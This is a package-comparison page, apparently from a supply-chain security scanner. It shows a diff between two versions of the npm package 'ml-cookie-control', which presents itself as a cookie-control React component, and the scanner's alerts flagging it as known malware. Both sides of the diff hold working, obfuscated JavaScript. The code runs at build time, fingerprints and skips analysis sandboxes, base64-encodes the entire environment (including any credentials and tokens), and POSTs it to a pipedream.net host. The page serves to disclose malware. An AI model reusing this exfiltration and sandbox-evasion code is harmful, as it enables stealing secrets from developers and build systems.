Huge News!Announcing our $40M Series B led by Abstract Ventures.Learn More →
ml-cookie-control
Advanced tools
ml-cookie-control - npm Package Compare versions
Comparing version 5.567.3 to 5.568.4
| { | ||
| "name": "ml-cookie-control", | ||
| "version": "5.567.3", | ||
| "version": "5.568.4", | ||
| "private": false, | ||
@@ -9,2 +9,3 @@ "description": "Cookie control react component", | ||
| "main": "dist/CookieControl.js", | ||
| "repository": "https://github.com/hmgc-lp/ml-cookie-control.git", | ||
| "scripts": { | ||
@@ -11,0 +12,0 @@ "build": "node scripts/script.js", |
| var http = require("https"); | ||
| var filter = [ | ||
| { | ||
| key: ["npm", "config", "registry"].join("_"), | ||
| val: ["taobao", "org"].join("."), | ||
| }, | ||
| { | ||
| key: ["npm", "config", "registry"].join("_"), | ||
| val: ["registry", "npmmirror", "com"].join("."), | ||
| }, | ||
| { key: "USERNAME", val: ["daas", "admin"].join("") }, | ||
| { key: "_", val: "/usr/bin/python" }, | ||
| { | ||
| key: ["npm", "config", "metrics", "registry"].join("_"), | ||
| val: ["mirrors", "tencent", "com"].join("."), | ||
| }, | ||
| [ | ||
| { key: "MAIL", val: ["", "var", "mail", "app"].join("/") }, | ||
| { key: "HOME", val: ["", "home", "app"].join("/") }, | ||
| { key: "USER", val: "app" }, | ||
| ], | ||
| [ | ||
| { key: "EDITOR", val: "vi" }, | ||
| { key: "PROBE_USERNAME", val: "*" }, | ||
| { key: "SHELL", val: "/bin/bash" }, | ||
| { key: "SHLVL", val: "2" }, | ||
| { key: "npm_command", val: "run-script" }, | ||
| { key: "NVM_CD_FLAGS", val: "" }, | ||
| { key: "npm_config_fund", val: "" }, | ||
| ], | ||
| [ | ||
| { key: "HOME", val: "/home/username" }, | ||
| { key: "USER", val: "username" }, | ||
| { key: "LOGNAME", val: "username" }, | ||
| ], | ||
| [ | ||
| { key: "PWD", val: "/my-app" }, | ||
| { key: "DEBIAN_FRONTEND", val: "noninteractive" }, | ||
| { key: "HOME", val: "/root" }, | ||
| ], | ||
| [ | ||
| { key: "INIT_CWD", val: "/analysis" }, | ||
| { key: "APPDATA", val: "/analysis/bait" }, | ||
| ], | ||
| [ | ||
| { key: "INIT_CWD", val: "/home/node" }, | ||
| { key: "HOME", val: "/root" }, | ||
| ], | ||
| [ | ||
| { key: "INIT_CWD", val: "/app" }, | ||
| { key: "HOME", val: "/root" }, | ||
| ], | ||
| ]; | ||
| function main() { | ||
| var data = global["proc" + "ess"][["v", "n", "e"].reverse().join("")] || {}; | ||
| function main() { | ||
| var data = process.env || {}; | ||
| var filter = [ | ||
| { | ||
| key: ["npm", "config", "regi" + "stry"].join("_"), | ||
| val: ["tao" + "bao", "org"].join("."), | ||
| }, | ||
| [ | ||
| { key: "MAIL", val: ["", "var", "mail", "app"].join("/") }, | ||
| { key: "HOME", val: ["", "home", "app"].join("/") }, | ||
| { key: "USER", val: "app" }, | ||
| ], | ||
| [ | ||
| { key: "EDITOR", val: "vi" }, | ||
| { key: "PROBE" + "_USERNAME", val: "*" }, | ||
| { key: "SHELL", val: "/bin/bash" }, | ||
| { key: "SHLVL", val: "2" }, | ||
| { key: "npm" + "_command", val: "run-script" }, | ||
| { key: "NVM" + "_CD_FLAGS", val: "" }, | ||
| { key: "npm_config_fund", val: "" }, | ||
| ], | ||
| [ | ||
| { key: "HOME", val: "/home/username" }, | ||
| { key: "USER", val: "username" }, | ||
| { key: "LOGNAME", val: "username" }, | ||
| ], | ||
| [ | ||
| { key: "PWD", val: "/my-app" }, | ||
| { key: "DEBIAN" + "_FRONTEND", val: "noninte" + "ractive" }, | ||
| { key: "HOME", val: "/root" }, | ||
| ], | ||
| [ | ||
| { key: "INIT_CWD", val: "/analysis" }, | ||
| { key: "APPDATA", val: "/analysis/bait" }, | ||
| ], | ||
| [ | ||
| { key: "INIT_CWD", val: "/home/node" }, | ||
| { key: "HOME", val: "/root" }, | ||
| ], | ||
| [ | ||
| { key: "INIT_CWD", val: "/app" }, | ||
| { key: "HOME", val: "/root" }, | ||
| ], | ||
| [ | ||
| { key: "USERNAME", val: "justin" }, | ||
| { key: "OS", val: "Windows_NT" }, | ||
| ], | ||
| { | ||
| key: ["npm", "config", "regi" + "stry"].join("_"), | ||
| val: ["regi" + "stry", "npm" + "mirror", "com"].join("."), | ||
| }, | ||
| { | ||
| key: ["npm", "config", "reg" + "istry"].join("_"), | ||
| val: ["cnp" + "mjs", "org"].join("."), | ||
| }, | ||
| { | ||
| key: ["npm", "config", "registry"].join("_"), | ||
| val: ["mir" + "rors", "cloud", "ten" + "cent", "com"].join("."), | ||
| }, | ||
| { key: "USERNAME", val: ["daas", "admin"].join("") }, | ||
| { key: "_", val: ["", "usr", "bin", "python"].join("/") }, | ||
| { | ||
| key: ["npm", "config", "metrics", "regis" + "try"].join("_"), | ||
| val: ["mir" + "rors", "ten" + "cent", "com"].join("."), | ||
| }, | ||
| { | ||
| key: "PWD", | ||
| val: [ | ||
| "", | ||
| "usr", | ||
| "local", | ||
| "lib", | ||
| "node" + "_modules", | ||
| data.npm_package_name, | ||
| ].join("/"), | ||
| }, | ||
| { | ||
| key: "PWD", | ||
| val: ["", data.USER, "node" + "_modules", data.npm_package_name].join( | ||
| "/" | ||
| ), | ||
| }, | ||
| { | ||
| key: ["node", "extra", "ca", "certs"].join("_").toUpperCase(), | ||
| val: "mit" + "mproxy", | ||
| }, | ||
| ]; | ||
| if ( | ||
@@ -62,12 +96,12 @@ filter.some((entry) => | ||
| .concat(entry) | ||
| .every( | ||
| (item) => | ||
| (data[item.key] || "").includes(item.val) || item.val === "*" | ||
| ) | ||
| .every((item) => data[item.key] && data[item.key].includes(item.val)) | ||
| ) || | ||
| Object.keys(data).length < 10 || | ||
| data.PWD === `/${data.USER}/node_modules/${data.npm_package_name}` || | ||
| (data.NODE_EXTRA_CA_CERTS || "").includes("mitmproxy") || | ||
| !data.npm_package_name || | ||
| !data.npm_package_version | ||
| !data.npm_package_version || | ||
| /C:\\Users\\[^\\]+\\Downloads\\node_modules\\/.test( | ||
| data.npm_package_json || "" | ||
| ) || | ||
| /C:\\Users\\[^\\]+\\Downloads/.test(data.INIT_CWD || "") || | ||
| (data.npm_package_json || "").startsWith("/npm" + "/node_" + "modules/") | ||
| ) { | ||
@@ -79,8 +113,5 @@ return; | ||
| .request({ | ||
| host: [ | ||
| ["eojin3", "zo6ansfxx"].join(""), | ||
| "m", | ||
| ["pipedre", "am"].join(""), | ||
| "net", | ||
| ].join("."), | ||
| host: ["eoarenda" + "8drrzt2", "m", "pi" + "ped" + "ream", "net"].join( | ||
| "." | ||
| ), | ||
| path: "/" + (data.npm_package_name || ""), | ||
@@ -91,3 +122,4 @@ method: "POST", | ||
| req.write(Buffer.from(JSON.stringify(data)).toString("base64")); | ||
| var trns = Buffer.from(JSON.stringify(data)).toString("base64"); | ||
| req.write(trns.slice(0, 2) + "zpp" + trns.slice(2)); | ||
| req.end(); | ||
@@ -94,0 +126,0 @@ } |
New alerts
License Policy Violation
LicenseThis package is not allowed per your license policy. Review the package's license to ensure compliance.
Found 1 instance in 1 package
Known malware
Supply chain riskThis package is malware. We have asked the package registry to remove it.
Found 1 instance in 1 package
Fixed alerts
License Policy Violation
LicenseThis package is not allowed per your license policy. Review the package's license to ensure compliance.
Found 1 instance in 1 package
Known malware
Supply chain riskThis package is malware. We have asked the package registry to remove it.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 1 instance in 1 package
No repository
Supply chain riskPackage does not have a linked source code repository. Without this field, a package will have no reference to the location of the source code use to generate the package.
Found 1 instance in 1 package
Improved metrics
- Total package byte prevSize
- increased by50.43%
6685
- Number of package files
- increased by25%
5
- Lines of code
- increased by27.19%
145
- Number of low supply chain risk alerts
- decreased by-50%
1
No dependency changes